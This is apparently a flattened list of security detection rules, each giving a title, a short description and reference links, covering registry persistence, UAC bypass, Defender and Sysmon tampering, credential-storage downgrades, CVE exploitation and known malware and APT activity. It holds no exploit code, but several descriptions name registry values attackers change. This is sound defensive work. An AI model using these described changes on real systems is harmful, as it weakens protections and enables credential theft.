https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6, https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN, https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html, https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html |
Suspicious Printer Driver Empty Manufacturer |
Detects a suspicious printer driver installation with an empty Manufacturer value |
https://twitter.com/SBousseaden/status/1410545674773467140 |
Registry Persistence via Explorer Run Key |
Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder |
https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/ |
New RUN Key Pointing to Suspicious Folder |
Detects suspicious new RUN key element pointing to an executable in a suspicious folder |
https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html |
Suspicious Service Installed |
Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.
Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
|
https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ |
Modify User Shell Folders Startup Value |
Detect modification of the startup key to a path where a payload could be stored to be launched during startup |
https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md |
Enable LM Hash Storage |
Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
|
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a, https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password, https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/ |
Scheduled TaskCache Change by Uncommon Program |
Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://labs.f-secure.com/blog/scheduled-task-tampering/ |
Potential Registry Persistence Attempt Via Windows Telemetry |
Detects potential persistence behavior using the windows telemetry registry key.
Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.
This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.
The problem is, it will run any arbitrary command without restriction of location or type.
|
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ |
RDP Sensitive Settings Changed to Zero |
Detects tampering of RDP Terminal Service/Server sensitive settings.
Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
|
https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html, http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/, https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03, https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/, http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/, https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services |
RDP Sensitive Settings Changed |
Detects tampering of RDP Terminal Service/Server sensitive settings.
Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
|
https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html, http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/, https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03, https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/, http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/, https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services, https://blog.sekoia.io/darkgate-internals/, https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry, https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry |
New TimeProviders Registered With Uncommon DLL Name |
Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
Adversaries may abuse time providers to execute DLLs when the system boots.
The Windows Time service (W32Time) enables time synchronization across and within domains.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md |
Old TLS1.0/TLS1.1 Protocol Version Enabled |
Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key. |
https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947 |
COM Hijacking via TreatAs |
Detect modification of TreatAs key to enable "rundll32.exe -sta" command |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md, https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s |
Potential Signing Bypass Via Windows Developer Features - Registry |
Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. |
https://twitter.com/malmoeb/status/1560536653709598721, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ |
UAC Bypass via Event Viewer |
Detects UAC bypass method using Windows event viewer |
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/, https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100 |
UAC Bypass via Sdclt |
Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) |
https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/, https://github.com/hfiref0x/UACME |
UAC Bypass Abusing Winsat Path Parsing - Registry |
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using Windows Media Player - Registry |
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) |
https://github.com/hfiref0x/UACME |
UAC Disabled |
Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
|
https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md |
UAC Notification Disabled |
Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
|
https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md, https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/ |
UAC Secure Desktop Prompt Disabled |
Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
|
https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md |
VBScript Payload Stored in Registry |
Detects VBScript content stored into registry keys as seen being used by UNC2452 group |
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ |
Wdigest Enable UseLogonCredential |
Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials |
https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html, https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649, https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials |
Execution DLL of Choice Using WAB.EXE |
This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry. |
https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml, https://twitter.com/Hexacorn/status/991447379864932352, http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ |
Disable Windows Defender Functionalities Via Registry Keys |
Detects when attackers or tools disable Windows Defender functionalities via the Windows registry |
https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105, https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html, https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html, https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html, https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/ |
Winget Admin Settings Modification |
Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks |
https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget, https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13 |
Enable Local Manifest Installation With Winget |
Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests. |
https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget |
Winlogon Notify Key Logon Persistence |
Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell |
Winlogon AllowMultipleTSSessions Enable |
Detects when the 'AllowMultipleTSSessions' value is enabled.
Which allows for multiple Remote Desktop connection sessions to be opened at once.
This is often used by attacker as a way to connect to an RDP session without disconnecting the other users
|
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html |
Sysmon Configuration Change |
Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration |
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon |
Sysmon Configuration Error |
Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html |
Sysmon Configuration Modification |
Detects when an attacker tries to hide from Sysmon by disabling or stopping it |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html |
Sysmon Blocked Executable |
Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy |
https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e |
Sysmon Blocked File Shredding |
Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy. |
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon |
Sysmon File Executable Creation Detected |
Triggers on any Sysmon "FileExecutableDetected" event, which triggers every time a PE that is monitored by the config is created. |
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon, https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36 |
WMI Event Subscription |
Detects creation of WMI event subscription persistence method |
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-19-wmievent-wmieventfilter-activity-detected, https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-20-wmievent-wmieventconsumer-activity-detected, https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-21-wmievent-wmieventconsumertofilter-activity-detected |
Suspicious Scripting in a WMI Consumer |
Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers |
https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/, https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19, https://github.com/RiccardoAncarani/LiquidSnake |
Suspicious Encoded Scripts in a WMI Consumer |
Detects suspicious encoded payloads in WMI Event Consumers |
https://github.com/RiccardoAncarani/LiquidSnake |
Rejetto HTTP File Server RCE |
Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287 |
https://vk9-sec.com/hfs-code-execution-cve-2014-6287/, https://www.exploit-db.com/exploits/39161, https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md |
CVE-2010-5278 Exploitation Attempt |
MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,
when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
|
https://github.com/projectdiscovery/nuclei-templates |
ZxShell Malware |
Detects a ZxShell start by the called and well-known function name |
https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100, https://pub-7cb8ac806c1b4c4383e585c474a24719.r2.dev/116309e7121bc8b0e66e4166c06f7b818e1d3629.pdf |
Turla Group Lateral Movement |
Detects automated lateral movement by Turla group |
https://securelist.com/the-epic-turla-operation/65545/ |
Turla Group Commands May 2020 |
Detects commands used by Turla group as reported by ESET in May 2020 |
https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf |
Exploit for CVE-2015-1641 |
Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 |
https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/, https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100 |
Exploit for CVE-2017-0261 |
Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 |
https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html |
Droppers Exploiting CVE-2017-11882 |
Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe |
https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100, https://www.linkedin.com/pulse/exploit-available-dangerous-ms-office-rce-vuln-called-thebenygreen-, https://github.com/embedi/CVE-2017-11882 |
Exploit for CVE-2017-8759 |
Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 |
https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100, https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 |
Adwind RAT / JRAT |
Detects javaw.exe in AppData folder as used by Adwind / JRAT |
https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100, https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf |
CosmicDuke Service Installation |
Detects the installation of a service named "javamtsup" on the system.
The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.
|
https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf |
Fireball Archer Install |
Detects Archer malware invocation via rundll32 |
https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/, https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100 |
Malware Shellcode in Verclsid Target Process |
Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro |
https://twitter.com/JohnLaTwC/status/837743453039534080 |
NotPetya Ransomware Activity |
Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil |
https://securelist.com/schroedingers-petya/78870/, https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100 |
Potential PlugX Activity |
Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location |
http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/, https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/ |
StoneDrill Service Install |
This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky |
https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/ |
WannaCry Ransomware Activity |
Detects WannaCry ransomware activity |
https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 |
Potential APT10 Cloud Hopper Activity |
Detects potential process and execution activity related to APT10 Cloud Hopper operation |
https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf |
Ps.exe Renamed SysInternals Tool |
Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report |
https://www.us-cert.gov/ncas/alerts/TA17-293A |
Equation Group C2 Communication |
Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools |
https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195 |
Lazarus System Binary Masquerading |
Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location |
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf |
Turla Group Named Pipes |
Detects a named pipe used by Turla group samples |
Internal Research, https://attack.mitre.org/groups/G0010/ |
Turla Service Install |
This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET |
https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/ |
Turla PNG Dropper Service |
This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018 |
https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/ |
Fortinet CVE-2018-13379 Exploitation |
Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs |
https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/ |
Oracle WebLogic Exploit |
Detects access to a webshell dropped into a keystore folder on the WebLogic server |
https://twitter.com/pyn3rd/status/1020620932967223296, https://github.com/LandGrey/CVE-2018-2894 |
Elise Backdoor Activity |
Detects Elise backdoor activity used by APT32 |
https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting, https://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf |
APT27 - Emissary Panda Activity |
Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 |
https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965, https://twitter.com/cyb3rops/status/1168863899531132929, https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/ |
Sofacy Trojan Loader Activity |
Detects Trojan loader activity as used by APT28 |
https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/, https://www.hybrid-analysis.com/sample/ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8?environmentId=110, https://twitter.com/ClearskySec/status/960924755355369472 |
APT29 2018 Phishing Campaign File Indicators |
Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant |
https://twitter.com/DrunkBinary/status/1063075530180886529, https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign |
APT29 2018 Phishing Campaign CommandLine Indicators |
Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant |
https://twitter.com/DrunkBinary/status/1063075530180886529, https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/, https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign |
OceanLotus Registry Activity |
Detects registry keys created in OceanLotus (also known as APT32) attacks |
https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/, https://github.com/eset/malware-ioc/tree/master/oceanlotus |
Potential MuddyWater APT Activity |
Detects potential Muddywater APT activity |
https://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign |
OilRig APT Activity |
Detects OilRig activity as reported by Nyotron in their March 2018 report |
https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf |
OilRig APT Registry Persistence |
Detects OilRig registry persistence as reported by Nyotron in their March 2018 report |
https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf |
OilRig APT Schedule Task Persistence - Security |
Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report |
https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf |
OilRig APT Schedule Task Persistence - System |
Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report |
https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf |
Defrag Deactivation |
Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group |
https://securelist.com/apt-slingshot/84312/ |
Defrag Deactivation - Security |
Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group |
https://securelist.com/apt-slingshot/84312/ |
TropicTrooper Campaign November 2018 |
Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia |
https://www.microsoft.com/en-us/security/blog/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/ |
Potential BearLPE Exploitation |
Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par |
https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp |
Pulse Secure Attack CVE-2019-11510 |
Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole |
https://www.exploit-db.com/exploits/47297 |
Exploiting SetupComplete.cmd CVE-2019-1378 |
Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378 |
https://web.archive.org/web/20200530031708/https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua |
Citrix Netscaler Attack CVE-2019-19781 |
Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack |
https://support.citrix.com/article/CTX267679, https://support.citrix.com/article/CTX267027, https://isc.sans.edu/diary/25686, https://twitter.com/mpgn_x64/status/1216787131210829826, https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md |
Exploiting CVE-2019-1388 |
Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM |
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388, https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege |
Potential Baby Shark Malware Activity |
Detects activity that could be related to Baby Shark malware |
https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ |
Confluence Exploitation CVE-2019-3398 |
Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398 |
https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181 |
Chafer Malware URL Pattern |
Detects HTTP request used by Chafer malware to receive data from its C2. |
https://securelist.com/chafer-used-remexi-malware/89538/ |
Potential Dridex Activity |
Detects potential Dridex acitvity via specific process patterns |
https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3, https://redcanary.com/threat-detection-report/threats/dridex/ |
Potential Dtrack RAT Activity |
Detects potential Dtrack RAT activity via specific process patterns |
https://securelist.com/my-name-is-dtrack/93338/, https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/, https://www.cyberbit.com/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/, https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/, https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/ |
Potential Emotet Activity |
Detects all Emotet like process executions that are not covered by the more generic rules |
https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/, https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/, https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/, https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/ |
Formbook Process Creation |
Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters. |
https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer, https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/, https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/, https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/ |
LockerGoga Ransomware Activity |
Detects LockerGoga ransomware activity via specific command line. |
https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a, https://blog.f-secure.com/analysis-of-lockergoga-ransomware/, https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/ |
Potential QBot Activity |
Detects potential QBot activity by looking for process executions used previously by QBot |
https://twitter.com/killamjr/status/1179034907932315648, https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/ |
Potential Ryuk Ransomware Activity |
Detects Ryuk ransomware activity |
https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/, https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/ |
Potential Snatch Ransomware Activity |
Detects specific process characteristics of Snatch ransomware word document droppers |
https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ |
Ursnif Malware C2 URL Pattern |
Detects Ursnif C2 traffic. |
https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html |
Ursnif Malware Download URL Pattern |
Detects download of Ursnif malware done by dropper documents. |
https://notebook.community/Cyb3rWard0g/HELK/docker/helk-jupyter/notebooks/sigma/proxy_ursnif_malware |
Potential Ursnif Malware Activity - Registry |
Detects registry keys related to Ursnif malware. |
